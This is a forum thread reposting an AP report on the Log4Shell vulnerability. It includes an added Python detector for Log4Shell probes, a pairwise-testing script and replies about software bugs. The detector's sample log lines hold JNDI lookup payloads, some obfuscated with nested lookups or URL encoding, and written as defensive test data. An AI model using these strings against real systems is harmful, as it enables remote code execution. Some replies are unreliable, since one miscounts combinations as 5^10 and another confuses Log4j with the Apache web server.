
Fri Dec 10, 2021, 07:19 PM

Global race to patch critical computer bug

Source: AP

By FRANK BAJAK

BOSTON (AP) — Security experts around the world raced Friday to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software.

“I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.

New Zealand’s computer emergency response team was among the first to report that the flaw in a Java-language utility for Apache servers used to log user activity was being “actively exploited in the wild” just hours after it was publicly reported Thursday and a patch released.

The vulnerability, dubbed ‘Log4Shell,’ was rated 10 on a scale of one to 10, the worst possible. Anyone with the exploit can get full access to an unpatched machine.



FILE - Lydia Winters shows off Microsoft's "Minecraft" built specifically for HoloLens at the Xbox E3 2015 briefing before Electronic Entertainment Expo, June 15, 2015, in Los Angeles. Security experts around the world raced Friday, Dec. 10, 2021, to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software. Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users by pasting a short message into a chat box. (AP Photo/Damian Dovarganes, File)


Read more: https://apnews.com/article/technology-business-lifestyle-software-apple-inc-aed3cc628fc602079b100757974c8f01

21 replies, 3134 views
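A little background the article leaves implicit, and an added example that is not from the AP piece, the forum, or the Log4j project itself. The flaw (CVE-2021-44228) sits in Apache Log4j 2, the Java logging library named in the article, which is bundled inside countless Java applications rather than being a server on its own. When a vulnerable log4j-core version logs a string that contains a `${jndi:...}` lookup, it fetches and can execute remote code named by that lookup, which is why a chat message or an HTTP header is enough to trigger it. The detector below normalizes URL encoding and the nested-lookup tricks (`${lower:j}`, `${::-j}`) that attackers use to hide the keyword, then flags lines that carry a JNDI lookup. The sample log lines are constructed, the IP addresses are documentation (TEST-NET) ranges, and the detector is a triage heuristic: a hit means someone probed you, not that the probe succeeded, and it does not replace upgrading log4j-core to a fixed release (2.17.1 or later for Java 8+).

```python
"""Heuristic detector for Log4Shell (CVE-2021-44228) probe strings in attacker-controlled text.
Added illustration, not code from the AP article or the Log4j project; SAMPLE_LINES are constructed."""
import re
import urllib.parse

# Log4j 2.x evaluates ${...} lookups recursively, so attackers hide the "jndi" keyword behind
# nested lookups such as ${lower:j}, ${upper:j} or ${::-j} (an empty lookup whose default value is "j").
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")          # an innermost lookup (no nested ${ inside)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(expr):
    """Collapse the obfuscation lookups we can evaluate offline; leave anything else untouched."""
    name, sep, rest = expr.partition(":")
    key = name.strip().lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    if ":-" in expr:                 # ${x:-default} (and ${::-j}) resolves to the default when the lookup fails
        return expr.split(":-", 1)[1]
    return "${" + expr + "}"         # unknown lookup: keep it so JNDI_RE can still see it


def normalize(text, max_rounds=10):
    """Undo URL encoding and nested-lookup obfuscation until the text stops changing."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):      # innermost-first, the way log4j's substitutor evaluates lookups
        collapsed = LOOKUP_RE.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(text):
    """True if the (de-obfuscated) text contains a JNDI lookup."""
    return JNDI_RE.search(normalize(text)) is not None


def scan_log_lines(lines):
    """Return (line number, normalized line) for every line that carries a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed samples: game-chat lines, web access logs with a hostile User-Agent or query string,
# and benign lines that contain ordinary ${...} placeholders.
SAMPLE_LINES = [
    '<Steve> hello everyone',
    '<griefer> ${jndi:ldap://203.0.113.5:1389/a}',
    '198.51.100.7 - - [10/Dec/2021:19:02:11 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.5/x}"',
    '198.51.100.7 - - [10/Dec/2021:19:02:12 +0000] "GET /?q=%24%7Bjndi%3Armi%3A//203.0.113.5/x%7D HTTP/1.1" 200',
    '198.51.100.7 - - [10/Dec/2021:19:02:13 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5/x}"',
    'order 4711 total ${price} shipped to ${env:REGION}',
]

if __name__ == "__main__":
    for lineno, norm in scan_log_lines(SAMPLE_LINES):
        print(f"line {lineno}: {norm}")
```

Run it over a real access log or chat transcript by replacing SAMPLE_LINES with the file's lines; the normalized form it prints is what Log4j would have evaluated, which is the string worth searching your other logs for.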

Replies to this discussion thread
21 replies (Author, Time, Post)
Reply Global race to patch critical computer bug (Original post)
Omaha Steve Dec 2021 OP
totodeinhere Dec 2021 #1
rickford66 Dec 2021 #2
totodeinhere Dec 2021 #3
rickford66 Dec 2021 #4
debsy Dec 2021 #6
Pobeka Dec 2021 #5
rickford66 Dec 2021 #8
totodeinhere Dec 2021 #11
erronis Dec 2021 #7
DavidDvorkin Dec 2021 #9
patphil Dec 2021 #10
Lucky Luciano Dec 2021 #12
TheRickles Dec 2021 #13
Firestorm49 Dec 2021 #15
Ouroborosnek Dec 2021 #16
discntnt_irny_srcsm Dec 2021 #17
Polybius Dec 2021 #18
cadoman Dec 2021 #20
Firestorm49 Dec 2021 #14
getagrip_already Dec 2021 #19
HuskyOffset Dec 2021 #21

Response to Omaha Steve (Original post)

Fri Dec 10, 2021, 08:17 PM

1. I am not very tech savvy but I have always wondered why there are so many bugs in software.

Why can't they test it and get it right before releasing it?



Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 08:42 PM

2. You're joking, right ?



Response to rickford66 (Reply #2)

Fri Dec 10, 2021, 08:47 PM

3. No, I'm not joking. I am sick and tired of computer bugs. n/t



Response to totodeinhere (Reply #3)

Fri Dec 10, 2021, 09:42 PM

4. Have you written code for commercial or military programs ?

That code is tested over and over several ways and there will always be bugs. Do not ride in a self driving car. I would never bet on even the simplest code I've ever written.



Response to rickford66 (Reply #4)

Fri Dec 10, 2021, 09:59 PM

6. I'm not being mean, I just know you have never worked in corporate IT.

The fact you asked "Why can't they test it and get it right before releasing it?" tells me so. I have worked in corporate IT for decades and it rarely works like that. Most sales people sell software on tight schedules for systems that they are not familiar with and that have never had due diligence performed on them. The timeframe and price tag is typically much lower than it should be. Customers and management push to get the product out the door as quickly as possible and oftentimes that results in an inferior product with many bugs that must be worked out in a production environment. And, yes, we humans are also not capable of thinking up the infinite scenarios that make a bug show itself. As rickford66 stated, there will always be bugs.



Response to totodeinhere (Reply #3)

Fri Dec 10, 2021, 09:47 PM

5. Then don't ever use a computer again. Sounds harsh but it's true.

There will never be a "bug free" world of computer software. It's virtually impossible.

New software is a lot better, but the exploits get more sophisticated.

I coded software as part of my job for 31 years, wrote over a million lines of working code, and we worked very hard to produce bug free code.

For a fun read on the problem, read Douglas Hofstadter's "Godel, Escher and Bach, An Eternal Golden Braid"

https://www.amazon.com/G%C3%B6del-Escher-Bach-Eternal-Golden/dp/0465026567



Response to Pobeka (Reply #5)

Fri Dec 10, 2021, 10:46 PM

8. totodeinhere would sh*t a brick if he/she saw the kluges in S/W he/she depends on.

Years ago while wringing out a beta level auto pilot computer, our guys found out they could crash it with valid inputs. When reporting to the manufacturer, they were advised "not to do that". At another job, one of my buddies showed me a possible divide by zero on another flight computer. He reported it as he should and was told "that will never happen". What "if" it happens he asked. "We'll reboot it when we land." was the reply. That's why I always felt completely safe on the old 727's. Manual boosted controls. The only ones lost were weather related.



Response to Pobeka (Reply #5)

Sat Dec 11, 2021, 12:11 AM

11. Just because there will always be bugs doesn't mean that I shouldn't use a computer.

n/t



Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 10:45 PM

7. The early chariots, carts, cars, airplanes, etc. all had bugs.

Many weren't discovered until thorough use.

And most of these things weren't connected to some global system where anybody/anywhere could test your apparatus's security and performance.

The best way to protect ourselves is to disconnect totally from any exchanges. Including voice (relaying fake news), etc.



Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 10:51 PM

9. The delusion that bug-free software is possible

Is why there are companies getting rich selling corporate executives snazzy new methodologies and procedures that are guaranteed to produce bug-free code in no time at all.



Response to totodeinhere (Reply #1)

Fri Dec 10, 2021, 11:28 PM

10. The problem is that bugs don't come with flags that identify the presence of a bug.

There are millions of lines of code in a large scale computer application. These applications are very complex, and consist of many separate modules that all work together in a well planned out way. As a former programmer and tester, I can tell you that you can only find what you anticipate. A hacker looks at code, not in the way it is intended to be used, but in the ways it can be broken. It's much more difficult to identify all these possibilities than you can imagine.
Testing has its limits. The permutations of all the possibilities for how a large, complex application can be used is such a large number that it would take an army of programmers decades to find and fix all of the possible vulnerabilities. Even code that has been around for decades can suddenly manifest a bug when someone does something unexpected while using the application. An operating system change can also wreak havoc on an otherwise stable program. So can a hardware change. Neither of these are malicious, but can still mess things up.
Now imagine a hacker who specializes in breaking the "unbreakable".
It's essentially impossible to anticipate all the possible ways a piece of code can be taken advantage of by a hacker. Successful hackers have the uncanny ability to find weak points in hardware, firmware, or software.
It's a never ending battle between those who defend our computers and the attacks of hackers. And, in today's world, any newly discovered vulnerability may be quickly passed around in the hacker community.

I don't believe there will ever be a time when computer systems are absolutely safe from malicious attacks.



Response to patphil (Reply #10)

Sat Dec 11, 2021, 12:44 AM

12. So far, no mention of heisenbugs! The worst kind! Totally evil.

Race conditions, deadlocks, and other crap that only rears its ugly head randomly…blech!



Response to patphil (Reply #10)

Sat Dec 11, 2021, 10:16 AM

13. Thanks for taking the time to explain this to non-IT DUers.



Response to patphil (Reply #10)

Sat Dec 11, 2021, 11:49 AM

15. Thank you. Your post is very informative. Perhaps it's time to unveil the "next generation"

of fool proof programming. I’m sure that by this time, our military has been using software that we may not see the benefit of for several more years. We were using the U2 and stealth technology well in advance of the public’s awareness. As what we like to think of as an “advanced” nation, with all of the brilliant minds at our disposal, we should be able to develop better, safer, quicker, and more reliable internet functions than that which we now have. Until then, tough luck.



Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 12:14 PM

16. One of the principles of software testing

Is that testing can find bugs, but can never prove the absence of bugs.

I enjoy the field of software testing but there are some misunderstandings about what testing can/cannot cover.

If you think about a variety of scenarios and inputs into any system, the more complex it becomes, it becomes an impossible task to test every one. Have to make a risk-based assessment to test the most critical paths.

Unfortunately that means there's always a chance something will get released with a bug and have to do your best to identify it quickly and resolve.

Just to put a little perspective to this, imagine testing an application that has 5 input fields and each field has 10 possible values. To test EVERY possible combination the tester will have to run 5^10 = 9,765,625 tests, which is quite impossible no matter the project timescale.

https://www.linkedin.com/pulse/10-software-testing-fallacies-kingsley-asuamah/



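The post above contrasts exhaustive testing with a risk-based selection of paths. The usual middle ground in practice is pairwise (all-pairs) testing: instead of every combination of every field, the suite only guarantees that every pair of values across any two fields appears together at least once, on the observation that most interaction bugs involve two inputs, not five. The block below is an added example, not from the post or the linked article; it builds a small greedy covering array for a constructed five-field, ten-value form and counts how many tests that needs versus the full cross product.

```python
"""Pairwise (all-pairs) test selection for a five-field, ten-value input form.
Added illustration, not from the thread; FIELDS is a constructed stand-in for a real form."""
from itertools import combinations

# Constructed example: five input fields, each accepting ten values
FIELDS = {f"field{i}": list(range(10)) for i in range(1, 6)}


def exhaustive_count(fields):
    """Number of tests needed to try every combination of every field's values."""
    total = 1
    for values in fields.values():
        total *= len(values)
    return total


def _pair(names, a, va, b, vb):
    """Canonical key for 'field a = va together with field b = vb', ordered by field position."""
    if names.index(a) > names.index(b):
        a, va, b, vb = b, vb, a, va
    return (a, va, b, vb)


def required_pairs(fields):
    """Every value pair across any two fields; a pairwise suite must exercise each at least once."""
    names = list(fields)
    return {
        _pair(names, a, va, b, vb)
        for a, b in combinations(names, 2)
        for va in fields[a]
        for vb in fields[b]
    }


def pairs_covered(fields, test):
    """The value pairs exercised by one complete test (one value per field)."""
    names = list(fields)
    return {_pair(names, a, test[a], b, test[b]) for a, b in combinations(names, 2)}


def pairwise_suite(fields):
    """Greedy covering-array construction: seed each test with a still-uncovered pair, then give
    every remaining field the value that covers the most uncovered pairs with what is already chosen."""
    names = list(fields)
    uncovered = required_pairs(fields)
    suite = []
    while uncovered:
        a, va, b, vb = min(uncovered)          # deterministic seed; removed below, so every round makes progress
        test = {a: va, b: vb}
        for name in names:
            if name in test:
                continue

            def gain(value, name=name, test=test):
                return sum(1 for x, vx in test.items() if _pair(names, x, vx, name, value) in uncovered)

            test[name] = max(fields[name], key=gain)   # ties go to the lowest value
        suite.append({n: test[n] for n in names})
        uncovered -= pairs_covered(fields, test)
    return suite


if __name__ == "__main__":
    suite = pairwise_suite(FIELDS)
    print(f"exhaustive: {exhaustive_count(FIELDS)} tests")
    print(f"pairwise:   {len(suite)} tests, e.g. {suite[0]}")
```

The lower bound for this form is 100 tests, because any two fields have 100 value pairs and a single test covers one of them; the greedy construction lands a little above that, which is the point: two orders of magnitude fewer runs than the cross product, while still catching any bug that depends on two inputs at once. Bugs that need three or more specific values together, and the unexpected inputs the other replies describe, are exactly what this kind of selection gives up.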


Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 12:54 PM

17. I work in software quality assurance. I have for decades.

The only way to come close to what you're suggesting is to have a rigid and formal set of requirements articulated before the architecture ever begins. Then to have design documents written that coders can follow precisely and then use software tools such as assemblers and compilers that were developed with the same level of rigor to create object code. Then to verify each and every requirement is met exactly without any unspecified activity. When all of this is done, there will be requirements that the code doesn't satisfy, tests that are valid, which the code/system doesn't pass. The requirements should be eliminated and the entire process restarted from the beginning.

Finally, evaluating the code by exercising it with a full functional and performance validation that confirms that absolutely every line of code is operated and that there is no "dead code" is about the only way to do what you're asking. No one can afford it.

Code reuse and iterative updates and revisions provide so many permutations that no degree of pre-planning and assessment will ever be complete.

Have a cartoon:



Response to totodeinhere (Reply #1)

Sat Dec 11, 2021, 02:31 PM

18. I can tell you aren't tech savvy lol

Code is huge for programs these days; there are always thousands of mistakes, some obvious, some not. This isn't the Atari 2600 days where one guy writes the entire code in a couple of weeks or less, although sometimes I wish it was...



Response to totodeinhere (Reply #1)

Sun Dec 12, 2021, 11:39 AM

20. there are certain products that have the level of testing you seek

But they tend to get updates less often, have fewer features, run slower, etc.

This may be the OS for you, totodeinhere:

https://www.openbsd.org/security.html

What's sad is even if the software folks do their part, there are still backdoors in a lot of hardware.



Response to Omaha Steve (Original post)

Sun Dec 12, 2021, 11:24 AM

19. fwiw, Apache is an open source web server.....

It is very common on linux servers of all kinds, embedded in devices like routers and iot appliances, and even in firewalls. It is available for windows, and is used extensively by applications, though MS has its own embedded web server (IIS).

In short, turning off apache would mean no web access to just about everything.



Response to Omaha Steve (Original post)

Sun Dec 12, 2021, 07:27 PM

21. Ars Technica's article about it

For a good explanation, here is Ars Technica's article about it.
